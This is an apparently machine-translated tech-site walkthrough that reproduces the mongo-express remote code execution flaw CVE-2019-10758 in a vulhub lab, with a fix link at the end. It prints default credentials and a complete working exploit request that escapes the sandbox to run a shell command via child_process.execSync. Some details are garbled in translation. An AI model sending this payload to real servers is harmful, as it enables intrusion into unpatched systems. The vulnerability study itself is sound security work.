Shulou(Shulou.com)06/01 Report--

This article will explain in detail how to carry out MongoDB mongo-express remote code execution, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Brief introduction of vulnerabilities:

The affected version of this package is vulnerable to remote code execution (RCE) attacks by endpoints using the toBSON method. Abuse vm dependencies to execute exec commands in an insecure environment. The default user name is admin and the password is pass.

Threat Typ

Remote code execution

Threat level

High

Vulnerability number

CVE-2019-10758

Affected system and application version

Mongo-express, version 0.54.0 and earlier

Unaffected version

Mongo-express 0.54.0 or later.

Recurrence of vulnerabilities:

This vulnerability environment feels that vulhub can be satisfied, so choose to build vulhub environment.

Vulhub download

Git clone https://github.com.cnpmjs.org/vulhub/vulhub

There is also a small benefit. Do you think it is very slow when you often git clone? How many kilos or more than ten kilos of downloads?

In order to solve this problem, many methods have been tried and the most effective one has been summed up.

When git clone, replace https://github.com with: https://github.com.cnpmjs.org/.

This is a domestic github mirror station, download speed.. I don't know, take off!

Install docker (I installed it before)

Install docker-compose

Pip install docker-compose

Enable docker, pull the image, and start the environment

PS: it's time to talk about another benefit. Do you feel slow when you docker pull? You have to use it to keep a backer as big as Ali.

Https://cr.console.aliyun.com/#/accelerator

Log in to Aliyun, there is a docker image acceleration in the lower left corner, follow the steps, and then. Take off!

They are all found out from one hole to the next.

So far, the environment has been successfully built!

After the environment starts, visit http://192.168.192.128:8081 to view the Web page.

Attack recurrence:

The code can be executed by sending the following packet directly

POST / checkValid HTTP/1.1Host: your-ipAccept-Encoding: gzip, deflateAccept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: closeAuthorization: Basic YWRtaW46cGFzcw==Content-Type: application/x-www-form-urlencodedContent-Length: 124 document=this.constructor.constructor ("return process") (). MainModule.require ("child_process"). ExecSync ("touch / tmp/success")

Poc goal: create a success file under / tcp

Access http://localhost:8081 after sending packet

Check to see if it was created successfully:

Docker-compose exec web ls / tmp

The successful creation of uccess files has come to this stage, what else can you do freely ~

Ps: this article is for communicative learning only.

2. Repair suggestion

Https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2

Delete the vm dependency in bson.js in 0.54.0 and use mongo-query-parser instead

On how to carry out MongoDB mongo-express remote code execution to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.